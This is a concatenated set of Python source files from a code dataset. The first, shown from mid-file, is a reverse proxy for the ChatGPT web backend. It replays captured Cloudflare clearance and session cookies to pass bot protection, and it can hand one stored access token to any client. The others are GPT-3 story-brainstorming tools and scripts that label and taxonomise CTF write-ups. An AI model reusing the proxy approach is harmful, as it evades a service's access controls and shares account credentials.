)
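# ReverseProxy flow: for each proxied request the client headers are copied, the
# host/origin/referer headers are overwritten with the upstream values, the upstream response is
# streamed back unchanged, and any Set-Cookie headers are re-issued on the outgoing response so
# cookies survive the proxy hop.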
class WebChatGPTProxy(ReverseProxy):
def __init__(
self,
cf_clearance: str,
user_agent: str,
puid: str,
access_token: Optional[str] = None,
trust: bool = False,
) -> None:
"""
:param cf_clearance: from `cf_clearance` cookie
:param user_agent: from `user-agent` header
:param access_token: from openai `access_token`
obtained from here https://chat.openai.com/api/auth/session
Used to refresh puid
:param puid: from `_puid` cookie
:param trust: Trust requests from any client.
When set to True, any requests without an access_token will be given the above access_token.
Default to False, which will only use for refresh puid.
"""
super().__init__(base_url="https://chat.openai.com/backend-api/")
self.cf_clearance = cf_clearance
self.user_agent = user_agent
self.access_token = access_token
self.puid = puid
self.trust = trust
self._app: Optional[FastAPI] = None
self._path: Optional[str] = None
self.valid_state = False
async def _prepare_cookies(self, request: Request):
cookies = await super()._prepare_cookies(request)
if self.cf_clearance is not None:
cookies.setdefault("cf_clearance", self.cf_clearance)
if self.puid is not None:
cookies.setdefault("_puid", self.puid)
return cookies
async def _prepare_headers(self, request: Request):
headers = await super()._prepare_headers(request)
headers["referer"] = "https://chat.openai.com"
headers["user-agent"] = self.user_agent
if self.trust and self.access_token:
headers.setdefault("authorization", f"Bearer {self.access_token}")
return headers
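# The overrides above inject the cf_clearance and _puid cookies together with the matching
# user-agent so proxied requests can pass Cloudflare, and attach the stored access_token only
# when trust=True (otherwise the token is kept solely for the periodic puid refresh).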
async def _process_response(self, response: httpx.Response):
if response.status_code == 200:
self.valid_state = True
elif response.status_code == 403:
logger.error("403 Forbidden found")
self.valid_state = False
async def _refresh_puid(self) -> bool:
"""
Send requests to /models through reverse proxy (current FastAPI app) to get a new puid
Deprecated
"""
if self._app is None:
logger.info("Not attached to any FastAPI app, skip")
async with httpx.AsyncClient(
app=self._app, base_url=f"https://chat.openai.com{self._path}"
) as client:
resp = await client.get(
"/models", headers={"authorization": f"Bearer {self.access_token}"}
)
puid = resp.cookies.get("_puid")
if puid:
logger.info(f"puid: {puid[:15]}...{puid[30:40]}...")
self.puid = puid
return True
else:
logger.error("Failed to get puid")
logger.error(f"Cookies: {resp.cookies}")
logger.error(f"Response: \n{resp.text}")
return False
async def _refresh_task(self) -> None:
if self.access_token is None:
logger.info("access_token not found, skip")
return
while True:
try:
await self.check_cf()
except Exception as e:
logger.exception(e)
await asyncio.sleep(60 * 60)
continue
await asyncio.sleep(60 * 60 * 6)
async def check_cf(self) -> bool:
if self._app is None:
logger.info("Not attached to any FastAPI app, cannot perform check")
async with httpx.AsyncClient(
app=self._app, base_url=f"https://chat.openai.com{self._path}"
) as client:
resp = await client.get(
"/models", headers={"authorization": f"Bearer {self.access_token}"}
)
if resp.status_code in (200, 401):
logger.info(f"Check passed, status code: {resp.status_code}")
puid = resp.cookies.get("_puid")
if puid:
logger.info(f"puid: {puid[:15]}...{puid[30:40]}...")
self.puid = puid
self.valid_state = True
return True
elif resp.status_code == 403:
logger.error(f"Check failed, status code 403")
logger.error(f"Response: \n{resp.text}")
return False
def attach(self, app: FastAPI, path: str) -> None:
super().attach(app=app, path=path, include_in_schema=self.trust)
self._app = app
self._path = path
| [] |
2024-01-10 | realsuperheavy/Creative-Writers-Toolkit | 1Create%20some%20characters.py | # -*- coding: utf-8 -*-
"""
Created on Thu May 26 09:00:55 2022
@author: user
"""
import os
import openai
from time import time,sleep
import re
import tkinter as tk
from tkinter import filedialog
from tkinter import *
from tkinter.filedialog import askopenfilename
def open_file(filepath):
with open(filepath, 'r', encoding='utf-8') as infile:
return infile.read()
openai.api_key = open_file('openaiapikey.txt')
def save_file(content, filepath):
with open(filepath, 'w', encoding='utf-8') as outfile:
outfile.write(content)
def isFileExists(filename):
return os.path.isfile(filename)
def gpt3_completion(prompt, engine='text-davinci-002', temp=1.0, top_p=1.0, tokens=1000, freq_pen=0.5, pres_pen=0.0, stop=['asdfasdf']):
max_retry = 5
retry = 0
while True:
try:
response = openai.Completion.create(
engine=engine, # use this for standard models
#model=engine, # use this for finetuned model
prompt=prompt,
temperature=temp,
max_tokens=tokens,
top_p=top_p,
frequency_penalty=freq_pen,
presence_penalty=pres_pen,
stop=stop)
text = response['choices'][0]['text'].strip()
#text = re.sub('\s+', ' ', text)
#save_gpt3_log(prompt, text)
return text
except Exception as oops:
retry += 1
if retry >= max_retry:
return None
print('Error communicating with OpenAI:', oops)
sleep(1)
def find_number(s):
for i in range(len(s)):
if s[i].isdigit():
return s[i:]
return None
def remove_linebreaks(s):
return re.sub(r'[\r\n]+', '', s)
def remove_nonprintable(s):
return re.sub(r'[^\x00-\x7F]+','', s)
def remove_spaces(s):
#remove_chars = '< > : " / \ | ? *.!@#$%^&*(){}[].,-?`;:'
#s = s.translate({ ord(c): None for c in remove_chars })
#return s
s = str(s).strip().replace(' ', '_')
return re.sub(r'(?u)[^-\w.]', '', s)
if __name__ == '__main__':
print("This code creates characters for your stories")
print("You can start from scratch, or use other text files (such as story synopses, series information, or other characters)")
print("to spark the ideas")
print("You can create multiple characters at a time")
print("This code will create two files per character: a detailed character breakdown, and a precis")
#ask for genre
storytype=input("Genre or type of story your character will appear in (leave blank if you like):")
#ask for supporting files
print("For supporting files, you can bring in a synopsis, and brainstorm a main, or supporting character")
print("or you can import another character and brainstorm their husband, or enemy, etc. ")
print("alternatively you could create a text file describing an alien race, and brainstorm a member of that species")
print("in fact any text file will do - keep it short though. Less is more")
supporting=input("Load supporting files(y/n)?")
supportingfiles=""
if supporting=="y":
while True:
ftext=""
root = Tk()
root.filename = askopenfilename(initialdir = "/",title = "Select supporting file",filetypes = (("text files","*.txt"),("all files","*.*")))
#print (root.filename)
scenename=os.path.basename(root.filename)
folderpath=os. path. dirname(root.filename)
print(folderpath)
ftext=""
with open(root.filename, "r") as f:
ftext = f.read()
root.destroy()
#load file
supportingfiles=supportingfiles+ftext+"\n"
an=input("Load Another(y/n)?")
if an=="n":
break
#ask for tweaks
print("Now you can add any additional info. This can be a short description")
print("eg. 'a character you'd find in a murder mystery'")
print("or 'the antagonist in the above story (if you've loaded in a supporting synopsis)")
print("or 'someone with a grudge against the character above' - again, any note will work!")
tweak=""
tweak=input("Additional character information?")
if tweak !="":
tweak="Make the character "+tweak
#ask for folder
nul=input("choose a folder to save the characters (hit return to continue)")
root = Tk()
root.attributes("-topmost", True)
folder_location = tk.filedialog.askdirectory()
root.destroy()
print ("Folder chosen: "+folder_location)
#ask how many characters
chars=1
ch=input("How many characters shall we brainstorm?")
chars=int(ch)
#load in prompt and assemble
folder = "planprompts/"
filename = "prompt01.txt"
filepath = os.path.join(folder, filename)
with open(filepath, "r") as f:
prompt = f.read()
prompt = prompt.replace('<<STORYTYPE>>', storytype).replace('<<SUPPORTINGFILES>>', supportingfiles).replace('<<TWEAK>>', tweak)
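# The template in planprompts/prompt01.txt is assumed to contain the literal placeholders
# <<STORYTYPE>>, <<SUPPORTINGFILES>> and <<TWEAK>>, which are substituted here with the genre,
# the concatenated supporting files and the extra character notes.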
#call gpt3
for char in range (1,chars+1):
print("Querying GPT3..........................................")
completion1 = gpt3_completion(prompt)
#get character name
completion1="1)"+completion1
completion1 = completion1.replace(r'\n', '\n\n')
name="000"
name = completion1[completion1.find("Name:")+len("Name:"):completion1.find("2)")]
name = remove_linebreaks(name)
name = remove_nonprintable(name)
name = remove_spaces(name)
if name == None:
name=""
name=name+str(char)+".txt"
print("character name:"+name)
print(completion1)
#create precis
print("Querying GPT3..........................................")
completion2 = gpt3_completion("Create a brief, 1 pargagraph summary of the following character"+"\n"+ completion1+"\n"+name+"\nSUMMARY:")
print (completion2)
#save files
filepath = os.path.join(folder_location, name)
with open(filepath,"w",encoding="utf-8") as f:
f.write(completion1)
filepath = os.path.join(folder_location, "Precis_"+name)
with open(filepath,"w",encoding="utf-8") as f:
f.write(completion2)
#find character name and save detailed character
#call gpt3 again to create precis and save
| [
"<<STORYTYPE>>",
"<<SUPPORTINGFILES>>"
] |
2024-01-10 | realsuperheavy/Creative-Writers-Toolkit | 2Create%20some%20synopses.py | # -*- coding: utf-8 -*-
"""
Created on Thu May 26 09:00:55 2022
@author: user
"""
import os
import openai
from time import time,sleep
import re
import tkinter as tk
from tkinter import filedialog
from tkinter import *
from tkinter.filedialog import askopenfilename
def open_file(filepath):
with open(filepath, 'r', encoding='utf-8') as infile:
return infile.read()
openai.api_key = open_file('openaiapikey.txt')
def save_file(content, filepath):
with open(filepath, 'w', encoding='utf-8') as outfile:
outfile.write(content)
def isFileExists(filename):
return os.path.isfile(filename)
def gpt3_completion(prompt, engine='text-davinci-002', temp=1.0, top_p=1.0, tokens=1000, freq_pen=0.5, pres_pen=0.0, stop=['asdfasdf']):
max_retry = 5
retry = 0
while True:
try:
response = openai.Completion.create(
engine=engine, # use this for standard models
#model=engine, # use this for finetuned model
prompt=prompt,
temperature=temp,
max_tokens=tokens,
top_p=top_p,
frequency_penalty=freq_pen,
presence_penalty=pres_pen,
stop=stop)
text = response['choices'][0]['text'].strip()
text = re.sub(r'\s+', ' ', text)
#save_gpt3_log(prompt, text)
return text
except Exception as oops:
retry += 1
if retry >= max_retry:
return None
print('Error communicating with OpenAI:', oops)
sleep(1)
def find_number(s):
for i in range(len(s)):
if s[i].isdigit():
return s[i:]
return None
def remove_linebreaks(s):
return re.sub(r'[\r\n]+', '', s)
def remove_nonprintable(s):
return re.sub(r'[^\x00-\x7F]+','', s)
def remove_spaces(s):
return s.replace(' ', '')
def remove_speechmarks(s):
remove_chars = '< > : " / \ | ? *.!@#$%^&*(){}[].,-?`;:'
s = s.translate({ ord(c): None for c in remove_chars })
return s
if __name__ == '__main__':
print("This code creates synopses")
print("You can start from scratch, or use other text files (such as story backgrounds, series information, or characters)")
print("to spark the ideas")
print("You can create multiple stories at a time")
#print("This code will create two files per story: a detailed breakdown, and a short summary")
#ask for genre
storytype=input("Genre or type of story (leave blank if you like):")
#ask for supporting files
print("For supporting files, you can bring in characters who will appear in the story")
print("or you can import background info like desciptions of themes, or ideas you want to explore ")
print("alternatively you could create a text file giving the backstory, or details of the world of the story")
print("in fact any text file will do - keep it short though. Less is more")
supporting=input("Load supporting files(y/n)?")
supportingfiles=""
if supporting=="y":
while True:
ftext=""
root = Tk()
root.filename = askopenfilename(initialdir = "/",title = "Select supporting file",filetypes = (("text files","*.txt"),("all files","*.*")))
#print (root.filename)
scenename=os.path.basename(root.filename)
folderpath=os. path. dirname(root.filename)
print(folderpath)
ftext=""
with open(root.filename, "r") as f:
ftext = f.read()
root.destroy()
#load file
supportingfiles=supportingfiles+ftext+"\n"
an=input("Load Another(y/n)?")
if an=="n":
break
if supportingfiles=="":
supportingfiles=="Intelligent, original storyline with large amounts of colour and detail."
#ask for tweaks
print("Now you can add any additional info. This can be a short description")
print("eg. 'a kids story about robots'")
print("or 'A story in which the above character is the hero (if you've loaded in a protagonist character)")
print("or 'a story set in the world described above - again, any note will work!")
tweak=""
tweak=input("Additional Story information?")
if tweak !="":
tweak="Make the story "+tweak
#ask for folder
nul=input("choose a folder to save the storylines (hit return to continue)")
root = Tk()
root.attributes("-topmost", True)
folder_location = tk.filedialog.askdirectory()
root.destroy()
print ("Folder chosen: "+folder_location)
#ask how many characters
chars=1
ch=input("How many stories shall we brainstorm?")
chars=int(ch)
#ask for a title
title=input("Story Title:")
#load in prompt and assemble
folder = "planprompts/"
filename = "synopsisprompt.txt"
filepath = os.path.join(folder, filename)
with open(filepath, "r") as f:
prompt = f.read()
prompt = prompt.replace('<<STORYTYPE>>', storytype).replace('<<SUPPORTINGFILES>>', supportingfiles).replace('<<TWEAK>>', tweak)
#call gpt3
for char in range (1,chars+1):
print("Querying GPT3..........................................")
completion1 = gpt3_completion(prompt)
#get story name
completion1="The story begins "+completion1
completion1 = completion1.replace(r'\n', '\n\n')
name=title+str(char)+".txt"
print("File title:"+name)
print(completion1)
#create scene breakdown
#folder = "planprompts/"
#filepath = os.path.join(folder, "synopsistoscenelist_multi.txt")
#with open(filepath, "r") as f:
# prompt8 = f.read()
#3 run the prompt
#scriptprompt= prompt8.replace('<<STORYTYPE>>', storytype).replace('<<SUPPORTINGFILES>>', supportingfiles).replace('<<TWEAK>>', tweak).replace('<<SYNOPSIS>>', completion1)
#print("QUERYING GPT3_____________________________________")
#completion8="frogspawn"
#completion8 = gpt3_completion(scriptprompt)
#completion8 = completion8.replace(r'\n', '\n')
#completion8="SCENE001:"+completion8
#print(completion8)
#save files
filepath = os.path.join(folder_location, "synopsis_"+name)
with open(filepath,"w",encoding="utf-8") as f:
f.write(completion1)
#filepath = os.path.join(folder_location, "story_breakdown_"+name)
#with open(filepath,"w",encoding="utf-8") as f:
# f.write(completion8)
#find character name and save detailed character
#call gpt3 again to create precis and save
| [
"<<STORYTYPE>>",
"<<SUPPORTINGFILES>>"
] |
2024-01-10 | francescolonardo/CTF_writeups_NLP_analysis | openai_analysis~02_data_processing~03_openai_generate_writeups_substeps.py | import json
import os
import re
import openai
def get_response(prompt: str):
response = openai.Completion.create(
model="text-davinci-003", # Replace with the latest GPT-3.5 model name
prompt=prompt,
max_tokens=1000,
)
return response.choices[0].text.strip() # Extract text from GPT-3.5 response
def find_steps_files_without_substeps():
steps_filepaths = []
for dirpath, dirnames, filenames in os.walk("../dataset_writeups"):
for filename in filenames:
if filename.endswith("_steps.json"):
steps_filepath = os.path.join(dirpath, filename)
substeps_filepath = steps_filepath.replace(
"_steps.json", "_substeps.json"
)
if not os.path.exists(substeps_filepath):
steps_filepaths.append(steps_filepath)
return steps_filepaths
def extract_json(s: str):
# Search for string patterns that look like JSON objects
for match in re.finditer(r"{[^}]*}", s):
substr = s[match.start() :]
# Try to load the substring as json, extending the substring until it succeeds or it's clear it's not json.
for end in range(len(substr), 0, -1):
try:
potential_json = json.loads(substr[:end])
# If it succeeds, return the valid json object.
return potential_json
except json.JSONDecodeError:
continue
return None # Return None if no valid JSON object is found.
if __name__ == "__main__":
with open("./api_keys.json", "r", encoding="utf-8") as f:
api_key = json.load(f)["api_key"]
openai.api_key = api_key
with open(
"../prompts/prompt_from_steps_to_substeps.txt", "r", encoding="utf-8"
) as f:
base_prompt = f.read()
try:
steps_filepaths = find_steps_files_without_substeps()
total_files = len(steps_filepaths)
for idx, step_filepath in enumerate(steps_filepaths, start=1):
with open(step_filepath, "r", encoding="utf-8") as writeup_file:
writeup = writeup_file.read()
prompt = base_prompt + "\n```" + writeup + "```"
print(f"[{idx}/{total_files}] Processing `{step_filepath}`")
try:
response_text = get_response(prompt=prompt)
# print(f"Response: {response_text}")
except openai.error.InvalidRequestError as e:
print(f"ERROR - OpenAI - {e}")
continue  # skip this file: response_text is undefined if the request failed
# Attempt to parse the JSON data
response_json_data = extract_json(response_text)
# Check if JSON is well-formed and complete
if response_json_data is not None:
try:
# Check if the structure contains the expected keys and values
steps_list = response_json_data.get("SubstepsModel", {}).get(
"Steps", []
)
if not steps_list:
raise ValueError("ERROR - JSON is missing 'Steps' list.")
for step in steps_list:
if "Substeps" not in step or not isinstance(
step["Substeps"], list
):
raise ValueError(
f"ERROR - Step {step.get('StepNumber')} does not contain a 'Substeps' list or 'Substeps' is not a list."
)
print("INFO - JSON appears to be well-formed and complete.")
steps_filepath = step_filepath.replace(
"_steps.json", "_substeps.json"
)
with open(steps_filepath, "w", encoding="utf-8") as steps_file:
json.dump(response_json_data, steps_file, indent=4)
print(f"Saved `{steps_filepath}`")
except ValueError as ve:
print(ve)
else:
print("ERROR - JSON may be truncated or invalid.")
except KeyboardInterrupt:
print("Stop.")
| [
"PLACEHOLDER\n```PLACEHOLDER```"
] |
2024-01-10 | francescolonardo/CTF_writeups_NLP_analysis | openai_analysis~03_taxonomy_development~07_openai_merge_taxonomies.py | import json
import os
import ast
import openai
def get_response(messages: list):
response = openai.ChatCompletion.create(
model="gpt-4",
messages=messages,
# temperature=1.0,
stream=False,
)
return response.choices[0].message.content
def extract_json(response):
try:
return json.loads(response)
except json.JSONDecodeError:
try:
return ast.literal_eval(response)
except (ValueError, SyntaxError):
print(
"Error: The response string is neither valid JSON nor a Python dict-like string"
)
return None
def find_taxonomized_groups_files_without_merged():
taxonomized_groups_filepaths = []
search_dir = "../data/groups"
processed_ranges = []
for dirpath, _, filenames in os.walk(search_dir):
for filename in filenames:
if filename.endswith("_merged.json"):
groups_part = filename.split("_")[1].replace("_merged.json", "")
start_group, end_group = map(int, groups_part.split("-"))
processed_ranges.append(range(start_group, end_group + 1))
for dirpath, _, filenames in os.walk(search_dir):
for filename in filenames:
if filename.startswith("groups_") and filename.endswith(
"_taxonomized.json"
):
groups_part = filename.split("_")[1].replace("_taxonomized.json", "")
start_group, end_group = map(int, groups_part.split("-"))
in_processed_range = any(
start_group in processed_range and end_group in processed_range
for processed_range in processed_ranges
)
if not in_processed_range:
taxonomized_groups_filepath = os.path.join(dirpath, filename)
taxonomized_groups_filepaths.append(taxonomized_groups_filepath)
return taxonomized_groups_filepaths
if __name__ == "__main__":
with open("../api_keys/api_key.json", "r", encoding="utf-8") as f:
api_key = json.load(f)["api_key"]
openai.api_key = api_key
with open("../prompts/04_prompt_merge_taxonomies.txt", "r", encoding="utf-8") as f:
prompt = f.read()
try:
taxonomized_groups_filepaths = find_taxonomized_groups_files_without_merged()
total_files = len(taxonomized_groups_filepaths)
idx = 0
while idx < total_files:
group_size = 2
if total_files - idx == 3:
group_size = 3
taxonomies = []
filepaths_to_merge = taxonomized_groups_filepaths[idx : idx + group_size]
for taxonomized_groups_filepath in filepaths_to_merge:
with open(taxonomized_groups_filepath, "r", encoding="utf-8") as f:
taxonomy = f.read()
taxonomies.append(taxonomy)
messages = [
{
"role": "user",
"content": prompt + "".join(taxonomies),
}
]
print(f"[{idx + 1}/{total_files}] Processing `{filepaths_to_merge}`")
try:
response = get_response(messages=messages)
except openai.error.InvalidRequestError as e:
print(f"ERROR - OpenAI - {e}")
idx += group_size
continue  # skip this batch: response is undefined if the request failed
response_json_data = extract_json(response)
if response_json_data is not None:
print("INFO - JSON appears to be well-formed and complete.")
first_file = filepaths_to_merge[0]
last_file = filepaths_to_merge[-1]
first_file_number = first_file.split("_")[1].split("-")[0]
last_file_number = last_file.split("_")[1].split("-")[-1]
merged_taxonomized_filepath = f"../data/groups/groups_{first_file_number}-{last_file_number}_merged.json"
with open(merged_taxonomized_filepath, "w", encoding="utf-8") as f:
f.write(response)
print(f"Saved `{merged_taxonomized_filepath}`")
else:
print("ERROR - JSON may be truncated or invalid.")
idx += group_size
except KeyboardInterrupt:
print("Stop.")
| [] |
2024-01-10 | francescolonardo/CTF_writeups_NLP_analysis | openai_analysis~03_taxonomy_development~06_openai_taxonomize_groups.py | import json
import os
import ast
import openai
def get_response(messages: list):
response = openai.ChatCompletion.create(
model="gpt-4",
messages=messages,
stream=False,
)
return response.choices[0].message.content
def extract_json(response):
try:
return json.loads(response)
except json.JSONDecodeError:
try:
return ast.literal_eval(response)
except (ValueError, SyntaxError):
print(
"Error: The response string is neither valid JSON nor a Python dict-like string"
)
return None
def find_substeps_groups_files_without_taxonomized():
substeps_groups_filepaths = []
search_dir = "../data/groups"
for dirpath, _, filenames in os.walk(search_dir):
for filename in filenames:
if (
filename.startswith("groups_")
and filename.endswith(".json")
and not filename.endswith(
"_taxonomized.json"
) # Change the file extension here
):
substeps_groups_filepath = os.path.join(dirpath, filename)
taxonomized_substeps_filepath = substeps_groups_filepath.replace(
".json", "_taxonomized.json" # Change the file extension here
)
if not os.path.exists(taxonomized_substeps_filepath):
substeps_groups_filepaths.append(substeps_groups_filepath)
return substeps_groups_filepaths
if __name__ == "__main__":
with open("../api_keys/api_key.json", "r", encoding="utf-8") as f:
api_key = json.load(f)["api_key"]
openai.api_key = api_key
with open(
"../prompts/prompts_taxonomy_development/02_prompt_taxonomize_substeps_groups.txt",
"r",
encoding="utf-8",
) as f:
prompt = f.read()
try:
substeps_groups_filepaths = find_substeps_groups_files_without_taxonomized()
total_files = len(substeps_groups_filepaths)
for idx, substeps_groups_filepath in enumerate(
substeps_groups_filepaths, start=1
):
with open(substeps_groups_filepath, "r", encoding="utf-8") as f:
substeps_groups_chunk = f.read()
messages = [
{
"role": "user",
"content": prompt + substeps_groups_chunk,
}
]
print(f"[{idx}/{total_files}] Processing `{substeps_groups_filepath}`")
try:
response = get_response(messages=messages)
except openai.error.InvalidRequestError as e:
print(f"ERROR - OpenAI - {e}")
continue  # skip this file: response is undefined if the request failed
response_json_data = extract_json(response)
if response_json_data is not None:
print("INFO - JSON appears to be well-formed and complete.")
taxonomized_groups_filepath = substeps_groups_filepath.replace(
".json", "_taxonomized.json" # Change the file extension here
)
with open(taxonomized_groups_filepath, "w", encoding="utf-8") as f:
f.write(response)
print(f"Saved `{taxonomized_groups_filepath}`")
else:
print("ERROR - JSON may be truncated or invalid.")
except KeyboardInterrupt:
print("Stop.")
| [
"PLACEHOLDERPLACEHOLDER"
] |
2024-01-10 | francescolonardo/CTF_writeups_NLP_analysis | openai_analysis~03_taxonomy_development~03_openai_group_substeps.py | import json
import os
import ast
import openai
def get_response(messages: list):
response = openai.ChatCompletion.create( # https://platform.openai.com/docs/api-reference/chat/create
model="gpt-3.5-turbo", # The name of the OpenAI chatbot model to use
messages=messages,
# temperature=1.0,
stream=False,
)
return response.choices[0].message.content
def find_list_substeps_files_without_grouped():
list_substeps_filepaths = []
# Define the directory to search in
search_dir = "../data/list_substeps"
for dirpath, _, filenames in os.walk(search_dir):
for filename in filenames:
# Check if the filename starts with "list_substeps_"
# and ends with ".json" but not with "_grouped.json"
if (
filename.startswith("list_substeps_")
and filename.endswith("_abstracted.json")
and not filename.endswith("_grouped.json")
):
# Get the complete path of the current file
list_substeps_filepath = os.path.join(dirpath, filename)
# Formulate the path of the corresponding _grouped.json file
grouped_substeps_filepath = list_substeps_filepath.replace(
"_abstracted.json", "_grouped.json"
)
# Check if the _grouped.json file exists
if not os.path.exists(grouped_substeps_filepath):
list_substeps_filepaths.append(list_substeps_filepath)
return list_substeps_filepaths
def extract_json(response):
try:
return json.loads(response)
except json.JSONDecodeError:
try:
return ast.literal_eval(response)
except (ValueError, SyntaxError):
print(
"Error: The response string is neither valid JSON nor a Python dict-like string"
)
return None
if __name__ == "__main__":
with open("../api_keys/api_key.json", "r", encoding="utf-8") as f:
api_key = json.load(f)["api_key"]
openai.api_key = api_key
with open("../prompts/02_prompt_group_substeps.txt", "r", encoding="utf-8") as f:
prompt = f.read()
try:
list_substeps_filepaths = find_list_substeps_files_without_grouped()
total_files = len(list_substeps_filepaths)
for idx, list_substeps_filepath in enumerate(list_substeps_filepaths, start=1):
with open(list_substeps_filepath, "r", encoding="utf-8") as f:
list_substeps_chunk = f.read()
messages = [
{
"role": "user",
"content": prompt + list_substeps_chunk,
}
]
print(f"[{idx}/{total_files}] Processing `{list_substeps_filepath}`")
try:
response = get_response(messages=messages)
except openai.error.InvalidRequestError as e:
print(f"ERROR - OpenAI - {e}")
continue  # skip this file: response is undefined if the request failed
# Attempt to parse the JSON data
response_json_data = extract_json(response)
# Check if JSON is well-formed and complete
if response_json_data is not None:
print("INFO - JSON appears to be well-formed and complete.")
grouped_substeps_filepath = list_substeps_filepath.replace(
"_abstracted.json", "_grouped.json"
)
with open(grouped_substeps_filepath, "w", encoding="utf-8") as f:
json.dump(response_json_data, f, indent=4)
print(f"Saved `{grouped_substeps_filepath}`")
else:
print("ERROR - JSON may be truncated or invalid.")
except KeyboardInterrupt:
print("Stop.")
| [
"PLACEHOLDERPLACEHOLDER"
] |
2024-01-10 | francescolonardo/CTF_writeups_NLP_analysis | openai_analysis~04_data_labelling~02_openai_labelling_substeps_tier1.py | import json
import os
import re
import openai
# Add the taxonomy_tier1 list
taxonomy_tier1_list = [
"Web Interaction and Navigation",
"Network and Communication Analysis",
"System Profiling and Analysis",
"Authentication and Authorization Management",
"Data Management",
"Cryptography and Encoding Management",
"Vulnerability and Exploitation Management",
"Database and File System Interaction",
"Tool Utilization and Scripting",
"Knowledge Management and Learning",
"Challenge and Strategy Management",
"Code Analysis and Debugging",
]
def get_response(messages: list):
response = openai.ChatCompletion.create(
model="gpt-4",
messages=messages,
stream=False,
)
return response.choices[0].message.content
def find_substeps_files_without_tier1():
substeps_filepaths = []
for dirpath, _, filenames in os.walk("../data/dataset_writeups"):
for filename in filenames:
if (
"_substeps_" in filename
and filename.endswith(".json")
and not filename.endswith("_tier1.json")
and not filename.endswith("_tier2.json")
):
substeps_filepath = os.path.join(dirpath, filename)
tier1_filepath = substeps_filepath.replace(".json", "_tier1.json")
if not os.path.exists(tier1_filepath):
substeps_filepaths.append(substeps_filepath)
return substeps_filepaths
def extract_json(s: str):
for match in re.finditer(r"{[^}]*}", s):
substr = s[match.start() :]
for end in range(len(substr), 0, -1):
try:
potential_json = json.loads(substr[:end])
return potential_json
except json.JSONDecodeError:
continue
return None
if __name__ == "__main__":
with open("../api_keys/api_key.json", "r", encoding="utf-8") as f:
api_key = json.load(f)["api_key"]
openai.api_key = api_key
with open(
"../prompts/prompt_tier1taxonomy_labelling_minimal.txt", "r", encoding="utf-8"
) as f:
taxonomy_requirements = f.read()
try:
substeps_filepaths = find_substeps_files_without_tier1()
total_files = len(substeps_filepaths)
for idx, substeps_filepath in enumerate(substeps_filepaths, start=1):
with open(substeps_filepath, "r", encoding="utf-8") as substeps_file:
substeps = substeps_file.read()
messages = [
{
"role": "user",
"content": taxonomy_requirements + substeps,
}
]
print(f"[{idx}/{total_files}] Processing `{substeps_filepath}`")
try:
response = get_response(messages=messages)
except openai.error.InvalidRequestError as e:
print(f"ERROR - OpenAI - {e}")
continue  # skip this file: response is undefined if the request failed
response_json_data = extract_json(response)
if response_json_data is not None:
if all(
key in response_json_data
for key in ["StepNumber", "StepString", "Substeps"]
):
all_substeps_valid = True
for substep in response_json_data.get("Substeps", []):
all_fields_present = all(
key in substep
for key in [
"SubstepNumber",
"SubstepString",
"Tier1Taxonomy",
]
)
if not all_fields_present:
print(
f"ERROR - Substep {substep.get('SubstepNumber', 'Unknown')} is missing some fields."
)
all_substeps_valid = False
break
taxonomy_values_valid = (
substep.get("Tier1Taxonomy") in taxonomy_tier1_list
)
if not substep.get("Tier1Taxonomy"):
print(
f"ERROR - Substep {substep.get('SubstepNumber', 'Unknown')} is missing taxonomy fields."
)
all_substeps_valid = False
break
if not taxonomy_values_valid:
print(
f"ERROR - Substep {substep.get('SubstepNumber', 'Unknown')} has invalid taxonomy values. Main: {substep.get('Tier1Taxonomy')}."
)
all_substeps_valid = False
break
if all_substeps_valid:
print("INFO - JSON appears to be well-formed and complete.")
tier1_filepath = substeps_filepath.replace(
".json", "_tier1.json"
)
with open(tier1_filepath, "w", encoding="utf-8") as tier1_file:
json.dump(response_json_data, tier1_file, indent=4)
print(f"Saved `{tier1_filepath}`")
else:
print("ERROR - JSON is missing expected keys or values.")
else:
print("ERROR - JSON may be truncated or invalid.")
except KeyboardInterrupt:
print("Stop.")
| [
"PLACEHOLDERPLACEHOLDER"
] |
2024-01-10 | francescolonardo/CTF_writeups_NLP_analysis | openai_analysis~03_taxonomy_development~08_openai_remerge_taxonomies.py | import json
import os
import ast
import openai
def get_response(messages: list):
response = openai.ChatCompletion.create(
model="gpt-4",
messages=messages,
# temperature=1.0,
stream=False,
)
return response.choices[0].message.content
def extract_json(response):
try:
return json.loads(response)
except json.JSONDecodeError:
try:
return ast.literal_eval(response)
except (ValueError, SyntaxError):
print(
"Error: The response string is neither valid JSON nor a Python dict-like string"
)
return None
def find_merged_groups_files_without_remerged():
merged_groups_filepaths = []
search_dir = "../data/groups"
processed_ranges = []
# Find all remerged file ranges
for dirpath, _, filenames in os.walk(search_dir):
for filename in filenames:
if filename.endswith("_remerged.json"):
groups_part = filename.split("_")[1].replace("_remerged.json", "")
start_group, end_group = map(int, groups_part.split("-"))
processed_ranges.append(range(start_group, end_group + 1))
# Find all merged files that don't have a corresponding remerged file
for dirpath, _, filenames in os.walk(search_dir):
for filename in filenames:
if filename.startswith("groups_") and filename.endswith("_merged.json"):
groups_part = filename.split("_")[1].replace("_merged.json", "")
start_group, end_group = map(int, groups_part.split("-"))
in_processed_range = any(
start_group in processed_range and end_group in processed_range
for processed_range in processed_ranges
)
if not in_processed_range:
merged_groups_filepath = os.path.join(dirpath, filename)
merged_groups_filepaths.append(merged_groups_filepath)
return merged_groups_filepaths
if __name__ == "__main__":
with open("../api_keys/api_key.json", "r", encoding="utf-8") as f:
api_key = json.load(f)["api_key"]
openai.api_key = api_key
with open("../prompts/05_prompt_final_merge.txt", "r", encoding="utf-8") as f:
prompt = f.read()
try:
merged_groups_filepaths = find_merged_groups_files_without_remerged()
total_files = len(merged_groups_filepaths)
idx = 0
while idx < total_files:
group_size = 2
if total_files - idx == 3:
group_size = 3
taxonomies = []
filepaths_to_merge = merged_groups_filepaths[idx : idx + group_size]
for merged_groups_filepath in filepaths_to_merge:
with open(merged_groups_filepath, "r", encoding="utf-8") as f:
taxonomy = f.read()
taxonomies.append(taxonomy)
messages = [
{
"role": "user",
"content": prompt + "".join(taxonomies),
}
]
print(f"[{idx + 1}/{total_files}] Processing `{filepaths_to_merge}`")
try:
response = get_response(messages=messages)
except openai.error.InvalidRequestError as e:
print(f"ERROR - OpenAI - {e}")
idx += group_size
continue  # skip this batch: response is undefined if the request failed
response_json_data = extract_json(response)
if response_json_data is not None:
print("INFO - JSON appears to be well-formed and complete.")
first_file = filepaths_to_merge[0]
last_file = filepaths_to_merge[-1]
first_file_number = first_file.split("_")[1].split("-")[0]
last_file_number = last_file.split("_")[1].split("-")[-1]
remerged_filepath = f"../data/groups/groups_{first_file_number}-{last_file_number}_remerged.json"
